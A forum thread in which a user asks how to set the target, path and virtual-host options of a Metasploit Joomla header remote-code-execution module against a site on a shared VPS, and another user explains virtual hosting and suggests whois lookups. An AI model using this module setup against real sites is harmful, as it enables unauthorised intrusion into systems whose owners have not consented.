Jump to content

updatesvc
 Share

Recommended Posts

I am trying to exploit the common joomla CMS application.

Here is some info on the exploit.

https://www.rapid7.com/db/modules/exploit/multi/http/joomla_http_header_rce

To use the exploit in msfconsole

type :

use exploit/multi/http/joomla_http_header_rce

So here comes my question.

In the options for the exploit comes my problem

show options
​###output below###

Name Current Setting Required Description
---- --------------- -------- -----------
HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 1.2.3.4 yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the Joomla application
VHOST no HTTP server virtual host

My problem is the VHOST setting.I do under stand what virtual host is( I think it is when one ip is used to host multiple domain names)

Imagine this scenario:

target website running joomla is http://www.joomla-target.com/joomla/ on port 80

domain is hosted on 1.2.3.4

but 1.2.3.4:80 is not the same as http://www.joomla-target.com:80 (<--my virtual host understanding)

I hope you have understood the scenario:

So what will be the options for

RHOST

TARGETURI

VHOST

RPORT

Please help.

Thanks in advance.

Edited by updatesvc
Link to comment
Share on other sites

It works like this.

You have BigProvider.com where people can purchase hosting for joomla sites. This normally results in 2 URLs for the same website:

http://BigProvider.com/JoomlaFanboi

http://JoomlaFanboi.com

In this case JoomlaFanboi.com is the target vhost on BigProvider.com

If it's just JoomlaFanboi.com self-hosting the site, punch them in for RHOST and leave VHOST blank (as it says, it's not required). If it isn't and you know the main provider (whois should tell you all you need to know) give those values.

Link to comment
Share on other sites

@cooper

Thanks for replying

can you be a little specific about your answer.

Let me explain my scenario a bit in detail.

http://www.joomla-target.com/joomla/ is hosted on a VPS with this ip 1.2.3.4 along with some other few websites.

So will the setting be:

Name Current Setting Required Description
---- --------------- -------- -----------
HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 1.2.3.4 yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /joomla/ yes The base path to the Joomla application
VHOST http://www.joomla-target.com no HTTP server virtual host
or
Name Current Setting Required Description
---- --------------- -------- -----------
HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 1.2.3.4 yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /joomla/ yes The base path to the Joomla application
VHOST www.joomla-target.com no HTTP server virtual host
I hope I am not asking too much.
Edited by updatesvc
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...